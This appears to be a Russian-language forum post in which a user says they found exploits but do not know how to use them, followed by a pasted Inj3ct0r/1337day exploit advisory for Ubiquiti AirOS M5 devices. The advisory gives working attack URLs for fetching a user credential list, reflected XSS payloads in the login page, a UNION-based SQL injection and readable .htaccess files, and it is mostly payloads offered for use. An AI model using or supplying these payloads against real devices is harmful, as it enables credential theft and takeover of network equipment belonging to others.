И ещё , нашёл експлоиты но хз как их применять
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Angel Injection member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] AirOs(NanoStation,AirGrid)M5 Multiple Vulnerabilities
[-] Found by Angel Injection
[-] Link:
www.ubnt.com [-] Security -::RISK: High
[-] platforms: hardware
[-]
http://1337day.com http://r00tw0rm.com http://i313.cc [-] Greetz to 1337day.com(r0073r) Team i313.cc(Sn!PEr_R00T,Lion,BackTrack) r00tw0rm.com Team (CrosS And All Members)
Exploit 1 (Exposure of User Credentials)
vuln
http://192.168.1.20:80/data/userlist.txt There Are .htaccess File
Exploit 2 (CrosS Site Scripting "prompt")
http://192.168.1.20/login.cgi?uri=" onmouseover=prompt(962038) bad=" http://192.168.1.20/login.cgi?uri=/index.php/"onmouseover=prompt(935107)%3E
http://192.168.1.20/login.cgi?uri=/"%20onmouseover=prompt(944551)%20bad="
Response Header
HTTP/1.1 200 OK
Set-cookie: ui_language=en_US; expires=Tuesday, 19-Jan-38 03:14:07 GMT
Content-type: text/html
Date: Wed, 30 Mar 2011 14:05:18 GMT
Server: lighttpd/1.4.28-devel-4866
Content-Length: 8180
Exploit 3 (sql Injection)
http://192.168.1.20:80/cms/revert-content.php?type=newest&id=[sql here]
http://192.168.1.20:80/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,11221133,null,null/*
Exploit 4 (.htaccess File Readable)
http://192.168.1.20/.htaccess http://192.168.1.20/cms/.htaccess http://192.168.1.20/FCKeditor/.htaccess http://192.168.1.20/data/.htaccess